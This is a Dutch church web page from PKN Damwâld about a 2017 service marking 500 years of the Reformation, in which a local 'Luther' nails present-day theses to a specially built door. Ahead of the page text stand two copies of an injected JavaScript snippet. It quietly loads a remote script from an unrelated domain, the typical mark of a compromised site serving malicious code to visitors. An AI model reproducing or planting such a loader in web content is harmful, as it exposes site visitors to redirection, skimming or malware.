;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Luther in Damwâld ... bekijk zeker even het filmpje ! - PKN Damwâld

Luther in Damwâld … bekijk zeker even het filmpje !

Gepubliceerd op: maandag 23 oktober 2017

Op 22 oktober werd door de liturgiecommissie in het kader van 500 jaar reformatie een dienst voorbereid met een opname van een Damwâldster Luther die eigentijdse stellingen aan de kerkdeur timmert. Een dienst met muziek, film, interactie en natuurlijk een boodschap.

Maarten Luther heeft 500 jaar geleden met zijn stellingen op de deur van de kerk van Wittenberg de mensen uitgedaagd om het gesprek aan te gaan over zijn stellingen. Hij wilde de mensen terugbrengen naar het fundament van de kerk. De deur van onze kerk De Ontmoeting is niet geschikt om er iets aan te hangen, daarom is er een deur gemaakt waar dat wel op kan. De gemeenteleden is na afloop van de dienst gevraagd om ook briefjes op de deur te hangen met onderwerpen waarvan zij vinden dat er over gesproken moet worden. Er zijn ook liederen van Maarten Luther in de dienst gezongen, onder anderen Lied 401 en een aantal verzen van lied 402.

Wat Damwâldster Luther precies kwam doen ? Bekijk het maar even!